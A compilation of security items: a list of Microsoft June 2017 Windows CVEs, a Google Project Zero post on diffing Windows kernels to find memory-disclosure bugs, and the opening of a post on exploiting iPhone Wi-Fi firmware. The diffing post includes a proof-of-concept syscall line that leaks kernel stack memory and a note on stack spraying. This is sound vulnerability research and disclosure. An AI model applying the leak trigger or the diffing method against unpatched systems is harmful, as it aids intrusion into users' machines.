
Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-8527) MS Rating: Critical

A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-8528) MS Rating: Critical

A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Remote Code Execution Vulnerability (CVE-2017-0283) MS Rating: Critical

A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0282) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0284) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-0285) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Uniscribe Information Disclosure Vulnerability (CVE-2017-8534) MS Rating: Important

An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Cumulative Security Update for Microsoft Windows Graphics

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0286) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0287) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0288) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-0289) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8531) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8532) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Windows Graphics Information Disclosure Vulnerability (CVE-2017-8533) MS Rating: Important

An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

Cumulative Security Update for Microsoft Windows Kernel-Mode Drivers

Windows Kernel Elevation of Privilege Vulnerability (CVE-2017-0297) MS Rating: Important

A privilege escalation vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited this issue could execute code with elevated permissions.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-0299) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-0300) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8462) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this issue could retrieve the base address of the kernel driver from a compromised process.

Win32k Elevation of Privilege Vulnerability (CVE-2017-8465) MS Rating: Important

A privilege escalation vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Win32k Elevation of Privilege Vulnerability (CVE-2017-8468) MS Rating: Important

A privilege escalation vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8469) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8470) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8471) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8472) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8473) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8474) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8475) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8476) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8477) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8478) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8479) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8480) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8481) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8482) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8483) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Win32k Information Disclosure Vulnerability (CVE-2017-8484) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8485) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8488) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8489) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8490) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8491) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Windows Kernel Information Disclosure Vulnerability (CVE-2017-8492) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory. An attacker can exploit this issue by sending a specially crafted application.

Cumulative Security Update for Microsoft Windows

LNK Remote Code Execution Vulnerability (CVE-2017-8464) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows that could be triggered if the icon of a specially crafted shortcut is displayed. An attacker who successfully exploited this issue could gain the same user rights as the local user.

Windows PDF Remote Code Execution Vulnerability (CVE-2017-0291) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could cause arbitrary code to execute in the context of the current user.

Windows PDF Remote Code Execution Vulnerability (CVE-2017-0292) MS Rating: Critical

A remote code execution vulnerability exists in Microsoft Windows if a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could cause arbitrary code to execute in the context of the current user.

Windows Remote Code Execution Vulnerability (CVE-2017-0294) MS Rating: Critical

A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. To exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.

Windows Search Remote Code Execution Vulnerability (CVE-2017-8543) MS Rating: Critical

A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this issue could take control of the affected system.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0173) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0215) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0216) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0218) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2017-0219) MS Rating: Important

A security bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this issue could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.

Windows Default Folder Tampering Vulnerability (CVE-2017-0295) MS Rating: Important

A tampering vulnerability exists in Microsoft Windows that could allow an authenticated attacker to modify the folder structure. An attacker who successfully exploited this issue could potentially modify files and folders that are synchronized the first time a user logs in locally to the computer.

Windows TDX Elevation of Privilege Vulnerability (CVE-2017-0296) MS Rating: Important

A privilege escalation vulnerability exists when tdx.sys fails to check the length of a buffer prior to copying memory to it.

Windows COM Session Elevation of Privilege Vulnerability (CVE-2017-0298) MS Rating: Important

A privilege escalation vulnerability exists in Windows when a DCOM object in Helppane.exe, configured to run as the interactive user, fails to properly authenticate the client.

Windows PDF Information Disclosure Vulnerability (CVE-2017-8460) MS Rating: Important

An information disclosure vulnerability exists in Microsoft Windows when a user opens a specially crafted PDF file. An attacker who successfully exploited this issue could read information in the context of the current user.

Windows Cursor Elevation of Privilege Vulnerability (CVE-2017-8466) MS Rating: Important

A privilege escalation vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this issue could run processes in an elevated context.

Windows Security Feature Bypass Vulnerability (CVE-2017-8493) MS Rating: Important

A security bypass vulnerability exists when Microsoft Windows fails to enforce case sensitivity for certain variable checks, which could allow an attacker to set variables that are either read-only or require authentication.

Windows Elevation of Privilege Vulnerability (CVE-2017-8494) MS Rating: Important

A privilege escalation vulnerability exists when Windows Secure Kernel Mode fails to properly handle objects in memory. To exploit the vulnerability, a locally-authenticated attacker could attempt to run a specially crafted application on a targeted system.

Windows VAD Cloning Denial of Service Vulnerability (CVE-2017-8515) MS Rating: Important

A denial of service vulnerability exists in Microsoft Windows when an unauthenticated attacker sends a specially crafted kernel mode request. An attacker who successfully exploited this issue could cause a denial of service on the target system, causing the machine to either stop responding or reboot.

Windows Search Information Disclosure Vulnerability (CVE-2017-8544) MS Rating: Important

An information disclosure vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.

GDI Information Disclosure Vulnerability (CVE-2017-8553) MS Rating: Important

An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this issue could obtain information to further compromise the user's system.


Using Binary Diffing to Discover Windows Kernel Memory Disclosure Bugs
7.10.2017 Google Project Zero
Vulnerability blog

Patch diffing is a common technique of comparing two binary builds of the same code – a known-vulnerable one and one containing a security fix. It is often used to determine the technical details behind ambiguously-worded bulletins, and to establish the root causes, attack vectors and potential variants of the vulnerabilities in question. The approach has attracted plenty of research [1][2][3] and tooling development [4][5][6] over the years, and has been shown to be useful for identifying so-called 1-day bugs, which can be exploited against users who are slow to adopt latest security patches. Overall, the risk of post-patch vulnerability exploitation is inevitable for software which can be freely reverse-engineered, and is thus accepted as a natural part of the ecosystem.

In a similar vein, binary diffing can be utilized to discover discrepancies between two or more versions of a single product, if they share the same core code and coexist on the market, but are serviced independently by the vendor. One example of such software is the Windows operating system, which currently has three versions under active support – Windows 7, 8 and 10 [7]. While Windows 7 still has a nearly 50% share on the desktop market at the time of this writing [8], Microsoft is known for introducing a number of structural security improvements and sometimes even ordinary bugfixes only to the most recent Windows platform. This creates a false sense of security for users of the older systems, and leaves them vulnerable to software flaws which can be detected merely by spotting subtle changes in the corresponding code in different versions of Windows.

In this blog post, we will show how a very simple form of binary diffing was effectively used to find instances of 0-day uninitialized kernel memory disclosure to user-mode programs. Bugs of this kind can be a useful link in local privilege escalation exploit chains (e.g. to bypass kernel ASLR), or just plainly expose sensitive data stored in the kernel address space. If you're not familiar with the bug class, we recommend checking the slides of the Bochspwn Reloaded talk given at the REcon and Black Hat USA conferences this year as a prior reading [9].
Chasing memset calls
Most kernel information disclosures are caused by leaving parts of large memory regions uninitialized before copying them to user-mode; be they structures, unions, arrays or some combination of these constructs. This typically means that the kernel provides a ring-3 program with more output data than there is relevant information, for a number of possible reasons: compiler-inserted padding holes, unused structure/union fields, large fixed-sized arrays used for variable-length content etc. In the end, these bugs are rarely fixed by switching to smaller buffers – more often than not, the original behavior is preserved, with the addition of one extra memset function call which pre-initializes the output memory area so it doesn't contain any leftover stack/heap data. This makes such patches very easy to recognize during reverse engineering.
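One common source of such leftover bytes, compiler-inserted padding, can be observed directly with Python's ctypes; the structure below is hypothetical, chosen only to force a padding hole:

```python
import ctypes

class ExampleOut(ctypes.Structure):
    """Hypothetical syscall output structure: a 1-byte field followed by an
    8-byte-aligned field forces 7 bytes of compiler-inserted padding."""
    _fields_ = [("flags",  ctypes.c_uint8),
                ("handle", ctypes.c_uint64)]

meaningful = sum(ctypes.sizeof(t) for _, t in ExampleOut._fields_)  # 9 bytes of real data
copied_out = ctypes.sizeof(ExampleOut)                              # 16 bytes leave the kernel
# Without a prior memset, the 7 padding bytes in between carry stale
# stack or heap contents when the whole structure is copied to user mode.
```

The fix pattern described above (one extra memset before filling the structure) zeroes those padding bytes without shrinking the copy, which is exactly why it stands out so clearly in a binary diff.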

When filing issue #1267 in the Project Zero bug tracker (Windows Kernel pool memory disclosure in win32k!NtGdiGetGlyphOutline, found by Bochspwn) and performing some cursory analysis, I realized that the bug was only present in Windows 7 and 8, while it had been internally fixed by Microsoft in Windows 10. The figure below shows the obvious difference between the vulnerable and fixed forms of the code, as decompiled by the Hex-Rays plugin and diffed by Diaphora:

Figure 1. A crucial difference in the implementation of win32k!NtGdiGetGlyphOutline in Windows 7 and 10

Considering how evident the patch was in Windows 10 (a completely new memset call in a top-level syscall handler), I suspected there could be other similar issues lurking in the older kernels that have been silently fixed by Microsoft in the more recent ones. To verify this, I decided to compare the number of memset calls in all top-level syscall handlers (i.e. functions starting with the Nt prefix, implemented by both the core kernel and graphical subsystem) between Windows 7 and 10, and later between Windows 8.1 and 10. Since in principle this was a very simple analysis, an adequately simple approach could be used to get sufficient results, which is why I decided to perform the diffing against code listings generated by the IDA Pro disassembler.

When doing so, I quickly found out that each memory zeroing operation found in the kernel is compiled in one of three ways: with a direct call to the memset function, its inlined form implemented with the rep stosd x86 instruction, or an unfolded series of mov x86 instructions:

Figure 2. A direct memset function call to reset memory in nt!NtCreateJobObject (Windows 7)


Figure 3. Inlined memset code used to reset memory in nt!NtRequestPort (Windows 7)

Figure 4. A series of mov instructions used to reset memory in win32k!NtUserRealInternalGetMessage (Windows 8.1)

The two most common cases (memset calls and rep stosd) are both decompiled to regular invocations of memset() by the Hex-Rays decompiler:

Figures 5 and 6. A regular memset call is indistinguishable from an inlined rep stosd construct in the Hex-Rays view

Unfortunately, a sequence of mov's with a zeroed-out register as the source operand is not recognized by Hex-Rays as a memset yet, but the number of such occurrences is relatively low, and hence can be neglected until we manually deal with any resulting false-positives later in the process. In the end, we decided to perform the diffing using decompiled .c files instead of regular assembly, just to make our life a bit easier.

A complete list of steps we followed to arrive at the final outcome is shown below. We repeated them twice, first for Windows 7/10 and then for Windows 8.1/10:

1. Decompiled ntkrnlpa.exe and win32k.sys from Windows 7 and 8.1 to their .c counterparts with Hex-Rays, and did the same with ntoskrnl.exe, tm.sys, win32kbase.sys and win32kfull.sys from Windows 10.
2. Extracted a list of kernel functions containing memset references (taking their quantity into account too), and sorted them alphabetically.
3. Performed a regular textual diff against the two lists, and chose the functions which had more memset references on Windows 10.
4. Filtered the output of the previous step against the list of functions present in the older kernels (7 or 8.1, again pulled from IDA Pro), to make sure that we didn't include routines which were only introduced in the latest system.
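The steps above can be sketched as a short script; the listing parsing is deliberately simplified and the function-matching heuristic is hypothetical, not the exact tooling used:

```python
import re
from collections import Counter

def memset_counts(listing_text):
    """Count memset references per Nt-prefixed handler in a decompiled
    pseudocode listing (simplified, heuristic matcher)."""
    counts = Counter()
    current = None
    # assume each decompiled function signature starts at column 0
    func_re = re.compile(r'^[\w* ]*\b(Nt\w+)\s*\(')
    for line in listing_text.splitlines():
        m = func_re.match(line)
        if m:
            current = m.group(1)
            counts.setdefault(current, 0)   # record handlers with zero memsets too
        elif current and 'memset' in line:
            counts[current] += 1
    return counts

def new_memset_candidates(old_listing, new_listing):
    """Handlers present in both listings that gained memset calls in the new one."""
    old, new = memset_counts(old_listing), memset_counts(new_listing)
    return sorted(f for f in new if f in old and new[f] > old[f])
```

Requiring the function to exist in both listings implements step 4: a handler introduced only in Windows 10 cannot indicate a silently patched bug in the older kernels.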

In numbers, we ended up with the following results:

                      ntoskrnl    ntoskrnl syscall    win32k      win32k syscall
                      functions   handlers            functions   handlers
  Windows 7 vs. 10    153         8                   89          16
  Windows 8.1 vs. 10  127         5                   67          11
Table 1. Number of old functions with new memset usage in Windows 10, relative to previous system editions

Quite intuitively, the Windows 7/10 comparison yielded more differences than the Windows 8.1/10 one, as the system progressively evolved from one version to the next. It's also interesting to see that the graphical subsystem had fewer changes detected in general, but more than the core kernel specifically in the syscall handlers. Once we knew the candidates, we manually investigated each of them in detail, discovering two new vulnerabilities in the win32k!NtGdiGetFontResourceInfoInternalW and win32k!NtGdiEngCreatePalette system services. Both of them were addressed in the September Patch Tuesday, and since they have some unique characteristics, we will discuss each of them in the subsequent sections.
win32k!NtGdiGetFontResourceInfoInternalW (CVE-2017-8684)
The inconsistent memset which gave away the existence of the bug is as follows:


Figure 8. A new memset added in win32k!NtGdiGetFontResourceInfoInternalW in Windows 10

This was a stack-based kernel memory disclosure of about 0x5c (92) bytes. The structure of the function follows a common optimization scheme used in Windows, where a local buffer located on the stack is used for short syscall outputs, and the pool allocator is only invoked for larger ones. The relevant snippet of pseudocode is shown below:


Figure 9. Optimized memory usage found in the syscall handler

It's interesting to note that even in the vulnerable form of the routine, memory disclosure was only possible when the first (stack) branch was taken, and thus only for requested buffer sizes of up to 0x5c bytes. That's because the dynamic PALLOCMEM pool allocator does zero out the requested memory before returning it to the caller:


Figure 10. PALLOCMEM always resets allocated memory

Furthermore, the issue is also a great example of how another peculiar behavior in interacting with user-mode may contribute to the introduction of a security flaw (see slides 32-33 of the Bochspwn Reloaded deck). The code pattern at fault is as follows:

Allocate a temporary output buffer based on a user-specified size (dubbed a4 in this case), as discussed above.
Have the requested information written to the kernel buffer by calling an internal win32k!GetFontResourceInfoInternalW function.
Write the contents of the entire temporary buffer back to ring-3, regardless of how much data was actually filled out by win32k!GetFontResourceInfoInternalW.

Here, the vulnerable win32k!NtGdiGetFontResourceInfoInternalW handler actually "knows" the length of meaningful data (it is even passed back to the user-mode caller through the 5th syscall parameter), but it still decides to copy the full amount of memory requested by the client, even though it is completely unnecessary for the correct functioning of the syscall:


Figure 11. There are v10 output bytes, but the function copies the full a4 buffer size.

The combination of a lack of buffer pre-initialization and allowing the copying of redundant bytes is what makes this an exploitable security bug. In the proof-of-concept program, we used an undocumented information class 5, which only writes to the first four bytes of the output buffer, leaving the remaining 88 uninitialized and ready to be disclosed to the attacker.
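The resulting leak is easy to model. The following is a toy Python simulation (syscall_copy_out is a name of our own, not kernel code) using the numbers from this syscall: a 0x5c-byte non-zeroed buffer of which only the first four bytes are written before the full copy-out:

```python
def syscall_copy_out(requested_size, bytes_written, stale_byte=0xAA):
    """Model of the vulnerable pattern: a local buffer is not pre-initialized,
    only partially filled, yet copied back to user-mode in full."""
    stack_buf = bytearray([stale_byte] * requested_size)  # leftover kernel stack data
    stack_buf[:bytes_written] = bytes(bytes_written)      # what the syscall really wrote
    return bytes(stack_buf)                               # full requested_size copy-out

leaked = syscall_copy_out(0x5C, 4)
assert leaked[:4] == b"\x00" * 4   # meaningful output
assert leaked[4:] == b"\xaa" * 88  # 88 stale bytes disclosed to the caller
```

Pre-initializing the buffer (the added memset) or copying only bytes_written bytes would each, on its own, have prevented the disclosure.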
win32k!NtGdiEngCreatePalette (CVE-2017-8685)
In this case, the vulnerability was fixed in Windows 8 by introducing the following memset into the syscall handler, while still leaving Windows 7 exposed:


Figure 12. A new memset added in win32k!NtGdiEngCreatePalette in Windows 8

The system call in question is responsible for creating a kernel GDI palette object consisting of N 4-byte color entries, for a user-controlled N. Again, a memory usage optimization is employed by the implementation – if N is less than or equal to 256 (1024 bytes in total), these items are read from user-mode to a kernel stack buffer using win32k!bSafeReadBits; otherwise, they are just locked in ring-3 memory by calling win32k!bSecureBits. As you can guess, the memory region with the extra memset applied to it is the local buffer used to temporarily store a list of user-defined RGB colors, and it is later passed to win32k!EngCreatePalette to actually create the palette object. The question is, how do we leave the buffer uninitialized while still having it used for the creation of a non-empty palette? The answer lies in the implementation of the win32k!bSafeReadBits routine:


Figure 13. Function body of win32k!bSafeReadBits

As you can see in the decompiled listing above, the function completes successfully without performing any actual work, if either the source or destination pointer is NULL. Here, the source address comes directly from the syscall's 3rd argument, which doesn't undergo any prior sanitization. This means that we can make the syscall think it has successfully captured an array of up to 256 elements from user-mode, while in reality the stack buffer isn't written to at all. This is achieved with the following system call invocation in our proof-of-concept program:

HPALETTE hpal = (HPALETTE)SystemCall32(__NR_NtGdiEngCreatePalette, PAL_INDEXED, 256, NULL, 0.0f, 0.0f, 0.0f);

Once the syscall returns, we receive a handle to the palette which internally stores the leaked stack memory. In order to read it back to our program, one more call to the GetPaletteEntries API is needed. To reiterate the severity of the bug, its exploitation allows an attacker to disclose an entire 1 kB of uninitialized kernel stack memory, which is a very powerful primitive to have in one's arsenal.

In addition to the memory disclosure itself, other interesting quirks can be observed in the nearby code area. If you look closely at the code of win32k!NtGdiEngCreatePalette in Windows 8.1 and 10, you will spot an interesting disparity between them: the stack array is fully reset in both cases, but it's achieved in different ways. On Windows 8.1, the function "manually" sets the first DWORD to 0 and then calls memset() on the remaining 0x3FC bytes, while Windows 10 just plainly memsets the whole 0x400-byte area. The reason for this is quite unclear, and even though the end result is the same, the discrepancy provokes the idea that not just the existence of memset calls can be compared across Windows versions, but also possibly the size operands of those calls.


Figure 14. Different code constructs used to zero out a 256-item array on Windows 8.1 and 10
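That extended comparison is easy to prototype on decompiled output. Below is a hypothetical helper (the regex is ours and deliberately narrow) that extracts the constant size operand of zeroing memset calls, so the sizes themselves can be diffed across versions just like the calls:

```python
import re

# Match "memset(<dst>, 0, <constant>)" where the size is a decimal or hex literal
MEMSET_RE = re.compile(r"memset\([^,]+,\s*0\s*,\s*(0x[0-9A-Fa-f]+|\d+)u?\)")

def memset_sizes(decompiled_line):
    """Extract the constant size operands of zeroing memset calls in one line."""
    return [int(size, 0) for size in MEMSET_RE.findall(decompiled_line)]

# The two flavours of the same zeroing described above
assert memset_sizes("memset(&Dst, 0, 0x3FCu);") == [0x3FC]
assert memset_sizes("memset(v13, 0, 0x400u);") == [0x400]
```

A per-function multiset of such sizes, compared across Windows versions, would flag the Figure 14 discrepancy automatically.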

On a last related note, the win32k!NtGdiEngCreatePalette syscall may be also quite useful for stack spraying purposes during kernel exploitation, as it allows programs to easily write 1024 controlled bytes to a continuous area of the stack. While the buffer size is smaller than what e.g. nt!NtMapUserPhysicalPages has to offer, the buffer itself ends at a higher offset relative to the stack frame of the top-level syscall handler, which can make an important difference in certain scenarios.
Conclusions
The aim of this blog post was to illustrate that security-relevant differences in concurrently supported branches of a single product may be used by malicious actors to pinpoint significant weaknesses or just regular bugs in the more dated versions of said software. Not only does it leave some customers exposed to attacks, but it also visibly reveals what the attack vectors are, which works directly against user security. This is especially true for bug classes with obvious fixes, such as kernel memory disclosure and the added memset calls. The "binary diffing" process discussed in this post was in fact pseudocode-level diffing that didn't require much low-level expertise or knowledge of the operating system internals. It could have been easily used by non-advanced attackers to identify the three mentioned vulnerabilities (CVE-2017-8680, CVE-2017-8684, CVE-2017-8685) with very little effort. We hope that these were some of the very few instances of such "low hanging fruit" being accessible to researchers through diffing, and we encourage software vendors to make sure of it by applying security improvements consistently across all supported versions of their software.

References

http://www.blackhat.com/presentations/bh-usa-09/OH/BHUSA09-Oh-DiffingBinaries-SLIDES.pdf
https://beistlab.files.wordpress.com/2012/10/isec_2012_beist_slides.pdf
https://www.rsaconference.com/writable/presentations/file_upload/ht-t10-bruh_-do-you-even-diff-diffing-microsoft-patches-to-find-vulnerabilities.pdf
https://www.zynamics.com/bindiff.html
http://www.darungrim.org/
https://github.com/joxeankoret/diaphora
https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet
http://gs.statcounter.com/os-version-market-share/windows/desktop/worldwide
http://j00ru.vexillium.org/slides/2017/recon.pdf


Over The Air - Vol. 2, Pt. 2: Exploiting The Wi-Fi Stack on Apple Devices
7.10.2017 Google Project Zero
Vulnerability blog

In this blog post we’ll continue our journey towards over-the-air exploitation of the iPhone, by means of Wi-Fi communication alone. This part of the research will focus on the firmware running on Broadcom’s Wi-Fi SoC present on the iPhone 7.

We’ll begin by performing a deep dive into the firmware itself; discovering new attack surfaces along the way. After auditing these attack surfaces, we’ll uncover several vulnerabilities. Finally, we’ll develop a fully functional exploit against one of the aforementioned vulnerabilities, thereby gaining code execution on the iPhone 7’s Wi-Fi chip. In addition to gaining code execution, we’ll also develop a covert backdoor, allowing us to remotely control the chip over-the-air.

Along the way, we’ll come across several new security mechanisms developed by Broadcom. While these mechanisms carry the potential to make exploitation harder, they remained rather ineffective in this particular case. By exploring the mechanisms themselves, we were able to discover methods to bypass their intended protections. Nonetheless, we remain hopeful that the issues highlighted in this blog post will help inspire stronger mitigations in the future.

All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5) were reported to Broadcom and subsequently fixed. I’d like to thank Broadcom for being highly responsive and for handling the issues in a timely manner. While we did not perform a full analysis on the breadth of these issues, a minimal analysis is available in the introduction to the previous blog post.

And now, without further ado, let’s get to it!
Exploring The Firmware

Combining the extracted ROM image we had just acquired with the resident RAM image, we can finally piece together the complete firmware image. With that, all that remains is to load the image into a disassembler and begin exploring.

While the ROM image on the BCM4355C0 is slightly larger than that of previously analysed Android-resident Wi-Fi chips, it’s still rather small (spanning only 896KB). Consequently, Broadcom has once again employed the same tricks in order to conserve as much memory as possible; including compiling the bulk of the code using the Thumb-2 instruction set and stripping away most of the symbols.

As for the ROM’s layout, it follows the same basic structure as that of its Android counterparts; beginning with a code chunk, followed by a blob of constant data (including strings and CRC polynomials), and ending with “trampolines” into detection points in the Wi-Fi firmware’s RAM (and some more spare data).

The same cannot be said of the RAM image; while some similarities exist between the current image and the previously analysed ones, their internal layouts are substantially different. Whereas Android-resident firmwares contained interspersed heap chunks between code and data blobs, this quirk is no longer present in the current RAM image. Instead, the heap chunks are mostly placed in a linear fashion. One exception to this rule is the initialisation code present in the RAM -- once the firmware’s bootup process completes, this blob is reclaimed, and is thereafter converted into an additional heap chunk.

